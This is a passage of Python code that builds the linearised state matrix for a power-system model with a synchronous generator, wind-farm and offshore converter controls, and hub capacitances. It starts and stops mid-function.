lambda_1[np.where(abs(lambda_1) < 1e-7)] = 0
return lambda_1, Amat, A, B, C, D
def nswph_linear3(x0, u, npr, off, wf, gpr):
delta = x0[gpr.x_idx['d']]
w = x0[gpr.x_idx['w']]
psi_d = x0[gpr.x_idx['psi_d']]
psi_q = x0[gpr.x_idx['psi_q']]
psi_fd = x0[gpr.x_idx['psi_fd']]
psi_1d = x0[gpr.x_idx['psi_1d']]
psi_1q = x0[gpr.x_idx['psi_1q']]
psi_2q = x0[gpr.x_idx['psi_2q']]
i_dg = x0[gpr.x_idx['Id']]
i_qg = x0[gpr.x_idx['Iq']]
Idw = x0[gpr.nx + wf.x_idx['Id']]
Iqw = x0[gpr.nx + wf.x_idx['Iq']]
thetaw = x0[gpr.nx + wf.x_idx['Theta']]
# Mpll = x0[7]
# ilx = x0[12]
# ily = x0[13]
# vd = x0[14]
# vq = x0[15]
Ido = x0[gpr.nx + wf.nx + off.x_idx['Id']]
Iqo = x0[gpr.nx + wf.nx + off.x_idx['Iq']]
thetao = x0[gpr.nx + wf.nx + off.x_idx['Theta']]
inw = gpr.nx + wf.nx + off.nx
voffx = x0[inw + 0]
voffy = x0[inw + 1]
vscx = x0[inw + 2]
vscy = x0[inw + 3]
vx2 = x0[inw + 4]
vy2 = x0[inw + 5]
vwfx = x0[inw + 6]
vwfy = x0[inw + 7]
itscx = x0[inw + 8]
itscy = x0[inw + 9]
itwfx = x0[inw + 10]
itwfy = x0[inw + 11]
icbx = x0[inw + 12]
icby = x0[inw + 13]
Csc = 0.01
Chub = 0.01
Lcb = 0.002103529614325069
Rcb = 0.0014730639731404956
Ccb = 0.4269650611647936 / 2
Ltsc = 0.15 / 3
Rtsc = 0.01 / 3
Ltwf = 0.15 / 8
Rtwf = 0.01 / 8
A = np.array([[0, npr.wn, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, (-gpr.dkd - gpr.dpe / w + gpr.dpe * (w - 1) / w ** 2) / gpr.Tj, -i_qg / (gpr.Tj * gpr.cosn),
i_dg / (gpr.Tj * gpr.cosn), 0, 0, 0, 0, psi_q / (gpr.Tj * gpr.cosn), -psi_d / (gpr.Tj * gpr.cosn), 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[npr.wn * (-vscx * np.sin(delta) + vscy * np.cos(delta)), npr.wn * psi_q, 0, npr.wn * w, 0, 0, 0, 0,
gpr.ra * npr.wn, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, npr.wn * np.cos(delta), npr.wn * np.sin(delta), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[npr.wn * (-vscx * np.cos(delta) - vscy * np.sin(delta)), -npr.wn * psi_d, -npr.wn * w, 0, 0, 0, 0, 0,
0, gpr.ra * npr.wn, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, -npr.wn * np.sin(delta), npr.wn * np.cos(delta), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, -gpr.rfd * gpr.x1d_loop * npr.wn / gpr.xdet_d,
-gpr.rfd * npr.wn * (-gpr.xad - gpr.xrld) / gpr.xdet_d, 0, 0, -gpr.kfd * gpr.rfd * npr.wn, 0,
gpr.rfd * npr.wn / gpr.xadu, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, -gpr.r1d * npr.wn * (-gpr.xad - gpr.xrld) / gpr.xdet_d,
-gpr.r1d * gpr.xfd_loop * npr.wn / gpr.xdet_d, 0, 0, -gpr.k1d * gpr.r1d * npr.wn, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, -gpr.r1q * gpr.x2q_loop * npr.wn / gpr.xdet_q,
-gpr.r1q * npr.wn * (-gpr.xaq - gpr.xrlq) / gpr.xdet_q, 0, -gpr.k1q * gpr.r1q * npr.wn, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, -gpr.r2q * npr.wn * (-gpr.xaq - gpr.xrlq) / gpr.xdet_q,
-gpr.r2q * gpr.x1q_loop * npr.wn / gpr.xdet_q, 0, -gpr.k2q * gpr.r2q * npr.wn, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0],
[npr.wn * (vscx * np.sin(delta) - vscy * np.cos(delta)) / gpr.xdpp,
npr.wn * (-gpr.k1q * psi_1q - gpr.k2q * psi_2q + gpr.xqpp * i_qg) / gpr.xdpp, 0, 0, npr.wn * (
-gpr.k1d * gpr.r1d * (
-gpr.xad - gpr.xrld) / gpr.xdet_d - gpr.kfd * gpr.rfd * gpr.x1d_loop / gpr.xdet_d) / gpr.xdpp,
npr.wn * (-gpr.k1d * gpr.r1d * gpr.xfd_loop / gpr.xdet_d - gpr.kfd * gpr.rfd * (
-gpr.xad - gpr.xrld) / gpr.xdet_d) / gpr.xdpp, -gpr.k1q * npr.wn * w / gpr.xdpp,
-gpr.k2q * npr.wn * w / gpr.xdpp,
npr.wn * (-gpr.k1d ** 2 * gpr.r1d - gpr.kfd ** 2 * gpr.rfd - gpr.ra) / gpr.xdpp,
gpr.xqpp * npr.wn * w / gpr.xdpp, gpr.kfd * gpr.rfd * npr.wn / (gpr.xadu * gpr.xdpp), 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-npr.wn * np.cos(delta) / gpr.xdpp, -npr.wn * np.sin(delta) / gpr.xdpp, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0],
[npr.wn * (vscx * np.cos(delta) + vscy * np.sin(delta)) / gpr.xqpp,
npr.wn * (gpr.k1d * psi_1d + gpr.kfd * psi_fd - gpr.xdpp * i_dg) / gpr.xqpp, 0, 0,
gpr.kfd * npr.wn * w / gpr.xqpp, gpr.k1d * npr.wn * w / gpr.xqpp, npr.wn * (
-gpr.k1q * gpr.r1q * gpr.x2q_loop / gpr.xdet_q - gpr.k2q * gpr.r2q * (
-gpr.xaq - gpr.xrlq) / gpr.xdet_q) / gpr.xqpp, npr.wn * (-gpr.k1q * gpr.r1q * (
-gpr.xaq - gpr.xrlq) / gpr.xdet_q - gpr.k2q * gpr.r2q * gpr.x1q_loop / gpr.xdet_q) / gpr.xqpp,
-gpr.xdpp * npr.wn * w / gpr.xqpp,
npr.wn * (-gpr.k1q ** 2 * gpr.r1q - gpr.k2q ** 2 * gpr.r2q - gpr.ra) / gpr.xqpp, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
npr.wn * np.sin(delta) / gpr.xqpp, -npr.wn * np.cos(delta) / gpr.xqpp, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / gpr.Te, -gpr.Kc / gpr.Te, gpr.Kc / (gpr.Tc * gpr.Te), 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / gpr.Tm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, vscx / (gpr.Tm * np.sqrt(vscx ** 2 + vscy ** 2)),
vscy / (gpr.Tm * np.sqrt(vscx ** 2 + vscy ** 2)), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, npr.wn * (-wf.Kpc - wf.Rt) / wf.Lt, 0,
npr.wn * wf.Kic / wf.Lt, 0, npr.wn / wf.Lt, 0, npr.wn * (
vwfx * np.sin(thetaw) - vwfy * np.cos(thetaw) - wf.Kp_pll * wf.Kpc * wf.Kpf * wf.Kpp * (
-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw))) / wf.Lt,
-npr.wn * wf.Ki_pll * wf.Kpc * wf.Kpf * wf.Kpp / wf.Lt, npr.wn * wf.Kif * wf.Kpc * wf.Kpp / wf.Lt,
npr.wn * wf.Kip * wf.Kpc / wf.Lt, 0, -npr.wn * wf.Kpc * wf.Kpp / wf.Lt, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
npr.wn * (wf.Kp_pll * wf.Kpc * wf.Kpf * wf.Kpp * np.sin(thetaw) - np.cos(thetaw)) / wf.Lt,
npr.wn * (-wf.Kp_pll * wf.Kpc * wf.Kpf * wf.Kpp * np.cos(thetaw) - np.sin(thetaw)) / wf.Lt, 0, 0, 0,
0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, npr.wn * (-wf.Kpc - wf.Rt) / wf.Lt, 0,
npr.wn * wf.Kic / wf.Lt, 0, npr.wn / wf.Lt,
npr.wn * (vwfx * np.cos(thetaw) + vwfy * np.sin(thetaw)) / wf.Lt, 0, 0, 0,
npr.wn * wf.Kiq * wf.Kpc / wf.Lt, 0, npr.wn * wf.Kpc * wf.Kpq * wf.Kq / wf.Lt,
npr.wn * wf.Kpc * wf.Kpq * wf.Kv / wf.Lt, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
npr.wn * np.sin(thetaw) / wf.Lt, -npr.wn * np.cos(thetaw) / wf.Lt, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0, 0,
-wf.Kp_pll * wf.Kpf * wf.Kpp * (-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw)),
-wf.Ki_pll * wf.Kpf * wf.Kpp, wf.Kif * wf.Kpp, wf.Kip, 0, -wf.Kpp, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, wf.Kp_pll * wf.Kpf * wf.Kpp * np.sin(thetaw),
-wf.Kp_pll * wf.Kpf * wf.Kpp * np.cos(thetaw), 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0, 0, 0, 0, 0, wf.Kiq, 0, wf.Kpq * wf.Kq,
wf.Kpq * wf.Kv, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / wf.Tad, 0,
(-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) / wf.Tad, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, np.cos(thetaw) / wf.Tad, np.sin(thetaw) / wf.Tad, 0, 0, 0, 0,
0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / wf.Tad,
(-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw)) / wf.Tad, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -np.sin(thetaw) / wf.Tad, np.cos(thetaw) / wf.Tad, 0, 0, 0, 0,
0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
npr.wn * wf.Kp_pll * (-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw)), npr.wn * wf.Ki_pll, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-npr.wn * wf.Kp_pll * np.sin(thetaw), npr.wn * wf.Kp_pll * np.cos(thetaw), 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, -np.sin(thetaw), np.cos(thetaw), 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-wf.Kp_pll * (-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw)), -wf.Ki_pll, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, wf.Kp_pll * np.sin(thetaw),
-wf.Kp_pll * np.cos(thetaw), 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-wf.Kp_pll * wf.Kpf * (-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw)), -wf.Ki_pll * wf.Kpf, wf.Kif,
0, 0, -1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
wf.Kp_pll * wf.Kpf * np.sin(thetaw), -wf.Kp_pll * wf.Kpf * np.cos(thetaw), 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, wf.Kq, wf.Kv, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, (vwfx * np.cos(thetaw) + vwfy * np.sin(thetaw)) / wf.Tpm,
(-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) / wf.Tpm, 0, 0, 0, 0, (
Idw * (-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) + Iqw * (
-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw))) / wf.Tpm, 0, 0, 0, 0, -1 / wf.Tpm,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
(Idw * np.cos(thetaw) - Iqw * np.sin(thetaw)) / wf.Tpm,
(Idw * np.sin(thetaw) + Iqw * np.cos(thetaw)) / wf.Tpm, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, (-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) / wf.Tpm,
(-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw)) / wf.Tpm, 0, 0, 0, 0, (
Idw * (-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw)) - Iqw * (
-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw))) / wf.Tpm, 0, 0, 0, 0, 0,
-1 / wf.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
(-Idw * np.sin(thetaw) - Iqw * np.cos(thetaw)) / wf.Tpm,
(Idw * np.cos(thetaw) - Iqw * np.sin(thetaw)) / wf.Tpm, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, (
(-2 * vwfx * np.sin(thetaw) + 2 * vwfy * np.cos(thetaw)) * (
vwfx * np.cos(thetaw) + vwfy * np.sin(thetaw)) / 2 + (
-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) * (
-2 * vwfx * np.cos(thetaw) - 2 * vwfy * np.sin(thetaw)) / 2) / (
wf.Tvm * np.sqrt((-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) ** 2 + (
vwfx * np.cos(thetaw) + vwfy * np.sin(thetaw)) ** 2)), 0, 0, 0, 0, 0, 0, -1 / wf.Tvm,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, (
-(-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) * np.sin(thetaw) + (
vwfx * np.cos(thetaw) + vwfy * np.sin(thetaw)) * np.cos(thetaw)) / (wf.Tvm * np.sqrt(
(-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) ** 2 + (
vwfx * np.cos(thetaw) + vwfy * np.sin(thetaw)) ** 2)), (
(-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) * np.cos(thetaw) + (
vwfx * np.cos(thetaw) + vwfy * np.sin(thetaw)) * np.sin(thetaw)) / (wf.Tvm * np.sqrt(
(-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) ** 2 + (
vwfx * np.cos(thetaw) + vwfy * np.sin(thetaw)) ** 2)), 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
npr.wn * (-off.Kpc - off.Rt) / off.Lt, 0, npr.wn * off.Kic / off.Lt, 0, npr.wn / off.Lt, 0,
npr.wn * (-off.Kp_pll * off.Kpc * off.Kpf * off.Kpp * (
-voffx * np.cos(thetao) - voffy * np.sin(thetao)) + voffx * np.sin(
thetao) - voffy * np.cos(thetao)) / off.Lt,
-npr.wn * off.Ki_pll * off.Kpc * off.Kpf * off.Kpp / off.Lt,
npr.wn * off.Kif * off.Kpc * off.Kpp / off.Lt, npr.wn * off.Kip * off.Kpc / off.Lt, 0,
-npr.wn * off.Kpc * off.Kpp / off.Lt, 0, 0,
npr.wn * (off.Kp_pll * off.Kpc * off.Kpf * off.Kpp * np.sin(thetao) - np.cos(thetao)) / off.Lt,
npr.wn * (-off.Kp_pll * off.Kpc * off.Kpf * off.Kpp * np.cos(thetao) - np.sin(thetao)) / off.Lt, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
npr.wn * (-off.Kpc - off.Rt) / off.Lt, 0, npr.wn * off.Kic / off.Lt, 0, npr.wn / off.Lt,
npr.wn * (voffx * np.cos(thetao) + voffy * np.sin(thetao)) / off.Lt, 0, 0, 0,
npr.wn * off.Kiq * off.Kpc / off.Lt, 0, npr.wn * off.Kpc * off.Kpq * off.Kq / off.Lt,
npr.wn * off.Kpc * off.Kpq * off.Kv / off.Lt, npr.wn * np.sin(thetao) / off.Lt,
-npr.wn * np.cos(thetao) / off.Lt, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0, 0,
-off.Kp_pll * off.Kpf * off.Kpp * (-voffx * np.cos(thetao) - voffy * np.sin(thetao)),
-off.Ki_pll * off.Kpf * off.Kpp, off.Kif * off.Kpp, off.Kip, 0, -off.Kpp, 0, 0,
off.Kp_pll * off.Kpf * off.Kpp * np.sin(thetao), -off.Kp_pll * off.Kpf * off.Kpp * np.cos(thetao), 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0,
0, 0, 0, 0, off.Kiq, 0, off.Kpq * off.Kq, off.Kpq * off.Kv, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-1 / off.Tad, 0, (-voffx * np.sin(thetao) + voffy * np.cos(thetao)) / off.Tad, 0, 0, 0, 0, 0, 0, 0,
np.cos(thetao) / off.Tad, np.sin(thetao) / off.Tad, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-1 / off.Tad, (-voffx * np.cos(thetao) - voffy * np.sin(thetao)) / off.Tad, 0, 0, 0, 0, 0, 0, 0,
-np.sin(thetao) / off.Tad, np.cos(thetao) / off.Tad, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
npr.wn * off.Kp_pll * (-voffx * np.cos(thetao) - voffy * np.sin(thetao)), npr.wn * off.Ki_pll, 0, 0,
0, 0, 0, 0, -npr.wn * off.Kp_pll * np.sin(thetao), npr.wn * off.Kp_pll * np.cos(thetao), 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-voffx * np.cos(thetao) - voffy * np.sin(thetao), 0, 0, 0, 0, 0, 0, 0, -np.sin(thetao),
np.cos(thetao), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-off.Kp_pll * (-voffx * np.cos(thetao) - voffy * np.sin(thetao)), -off.Ki_pll, 0, 0, 0, 0, 0, 0,
off.Kp_pll * np.sin(thetao), -off.Kp_pll * np.cos(thetao), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-off.Kp_pll * off.Kpf * (-voffx * np.cos(thetao) - voffy * np.sin(thetao)), -off.Ki_pll * off.Kpf,
off.Kif, 0, 0, -1, 0, 0, off.Kp_pll * off.Kpf * np.sin(thetao),
-off.Kp_pll * off.Kpf * np.cos(thetao), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, off.Kq, off.Kv, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
(voffx * np.cos(thetao) + voffy * np.sin(thetao)) / off.Tpm,
(-voffx * np.sin(thetao) + voffy * np.cos(thetao)) / off.Tpm, 0, 0, 0, 0, (
Ido * (-voffx * np.sin(thetao) + voffy * np.cos(thetao)) + Iqo * (
-voffx * np.cos(thetao) - voffy * np.sin(thetao))) / off.Tpm, 0, 0, 0, 0,
-1 / off.Tpm, 0, 0, (Ido * np.cos(thetao) - Iqo * np.sin(thetao)) / off.Tpm,
(Ido * np.sin(thetao) + Iqo * np.cos(thetao)) / off.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
(-voffx * np.sin(thetao) + voffy * np.cos(thetao)) / off.Tpm,
(-voffx * np.cos(thetao) - voffy * np.sin(thetao)) / off.Tpm, 0, 0, 0, 0, (
Ido * (-voffx * np.cos(thetao) - voffy * np.sin(thetao)) - Iqo * (
-voffx * np.sin(thetao) + voffy * np.cos(thetao))) / off.Tpm, 0, 0, 0, 0, 0,
-1 / off.Tpm, 0, (-Ido * np.sin(thetao) - Iqo * np.cos(thetao)) / off.Tpm,
(Ido * np.cos(thetao) - Iqo * np.sin(thetao)) / off.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, (
(-2 * voffx * np.sin(thetao) + 2 * voffy * np.cos(thetao)) * (
voffx * np.cos(thetao) + voffy * np.sin(thetao)) / 2 + (
-voffx * np.sin(thetao) + voffy * np.cos(thetao)) * (
-2 * voffx * np.cos(thetao) - 2 * voffy * np.sin(thetao)) / 2) / (
off.Tvm * np.sqrt((-voffx * np.sin(thetao) + voffy * np.cos(thetao)) ** 2 + (
voffx * np.cos(thetao) + voffy * np.sin(thetao)) ** 2)), 0, 0, 0, 0, 0, 0,
-1 / off.Tvm, (-(-voffx * np.sin(thetao) + voffy * np.cos(thetao)) * np.sin(thetao) + (
voffx * np.cos(thetao) + voffy * np.sin(thetao)) * np.cos(thetao)) / (off.Tvm * np.sqrt(
(-voffx * np.sin(thetao) + voffy * np.cos(thetao)) ** 2 + (
voffx * np.cos(thetao) + voffy * np.sin(thetao)) ** 2)), (
(-voffx * np.sin(thetao) + voffy * np.cos(thetao)) * np.cos(thetao) + (
voffx * np.cos(thetao) + voffy * np.sin(thetao)) * np.sin(thetao)) / (
off.Tvm * np.sqrt((-voffx * np.sin(thetao) + voffy * np.cos(thetao)) ** 2 + (
voffx * np.cos(thetao) + voffy * np.sin(thetao)) ** 2)), 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
npr.wn * off.Sn * np.cos(thetao) / (Chub * npr.Sb),
-npr.wn * off.Sn * np.sin(thetao) / (Chub * npr.Sb), 0, 0, 0, 0,
npr.wn * off.Sn * (-Ido * np.sin(thetao) - Iqo * np.cos(thetao)) / (Chub * npr.Sb), 0, 0, 0, 0, 0, 0,
0, 0, npr.wn, 0, 0, 0, 0, 0, 0, -npr.wn / Chub, 0, -npr.wn / Chub, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
npr.wn * off.Sn * np.sin(thetao) / (Chub * npr.Sb),
npr.wn * off.Sn * np.cos(thetao) / (Chub * npr.Sb), 0, 0, 0, 0,
npr.wn * off.Sn * (Ido * np.cos(thetao) - Iqo * np.sin(thetao)) / (Chub * npr.Sb), 0, 0, 0, 0, 0, 0,
0, -npr.wn, 0, 0, 0, 0, 0, 0, 0, 0, -npr.wn / Chub, 0, -npr.wn / Chub, 0, 0],
